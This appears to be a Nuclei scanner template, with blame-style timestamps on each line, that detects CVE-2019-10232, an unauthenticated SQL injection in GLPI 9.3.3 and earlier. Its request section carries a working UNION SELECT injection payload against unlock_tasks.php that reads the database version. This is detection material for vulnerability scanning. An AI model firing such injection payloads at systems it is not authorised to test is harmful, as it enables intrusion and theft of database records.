2021-11-13 14:26:16 +00:00
id : CVE-2019-10232
info :
2022-11-29 05:35:06 +00:00
name : Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
2021-11-13 14:26:16 +00:00
author : RedTeamBrasil
2021-11-13 14:29:44 +00:00
severity : critical
2023-07-11 19:49:27 +00:00
description : Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to a patched version of Teclib GLPI (9.3.4 or later) to mitigate this vulnerability.
2021-11-13 14:26:16 +00:00
reference :
- https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
- https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
2022-04-01 08:51:42 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-10232
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/HimmelAward/Goby_POC
2021-11-13 14:29:44 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-11-13 14:29:44 +00:00
cve-id : CVE-2019-10232
cwe-id : CWE-89
2024-03-23 09:28:19 +00:00
epss-score : 0.12149
2024-04-08 11:34:33 +00:00
epss-percentile : 0.95246
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : teclib-edition
product : gestionnaire_libre_de_parc_informatique
2023-12-05 09:50:33 +00:00
tags : cve,cve2019,glpi,sqli,injection,teclib-edition
2021-11-13 14:26:16 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-13 14:26:16 +00:00
- method : GET
path :
- "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
- "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
stop-at-first-match : true
matchers :
- type : word
part : body
words :
- "-MariaDB-"
- "Start unlock script"
condition : and
extractors :
- type : regex
regex :
- "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
2023-07-11 19:49:27 +00:00
part : body
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100efff10a9f7ef07b0c26cf059ac132ff1bd1afdac52ce651b2e0b519e4207debd022100c1d21956a12aac1e196d8bc9e988ecff71dd81575e68f0572017946fccef80b2:922c64590222798bb761d5b6d8e72950